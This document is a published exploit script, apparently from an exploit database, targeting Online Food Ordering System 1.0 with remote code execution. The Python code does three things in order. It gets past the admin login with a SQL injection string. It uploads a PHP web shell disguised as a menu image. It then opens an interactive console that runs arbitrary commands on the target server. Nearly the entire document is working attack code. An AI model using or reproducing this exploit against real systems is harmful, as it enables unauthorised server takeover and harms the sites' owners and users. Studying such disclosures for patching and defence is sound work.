Online Food Ordering System 1.0 - Remote Code Execution

# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A

# Setup: pip3 install bs4 .

# Exploit Code :


import requests,sys,string,random
from bs4 import BeautifulSoup

def get_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str

session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"
def Help():
    print("[?] Usage: python AporlorRCE.py <Domain>")

def Upload():
    session = requests.session()
    burp0_url = Domain+"/admin/ajax.php?action=save_menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
    burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except:
        print("[-] Request Failed")
        Help()

def Login():
    burp0_url = Domain+"/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            print("[+] Login Failed")
    except:
        print("[-] Request Failed")
        Help()

def FoundMyRCE():
    global FileName
    burp0_url = Domain+"/admin/index.php?page=menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            if RandomFileName in MyRCE["src"]:
                FileName = MyRCE["src"].strip("../assets/img/")
                print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
    except:
        print("[-] Request Failed")
        Help()

def Terminal():
    while True:
        Command = input("Console: ")
        burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
        try:
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
        except:
            print("[-] Request Error")
if __name__ == "__main__":
    if len(sys.argv) == 2:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
    else:
        Help()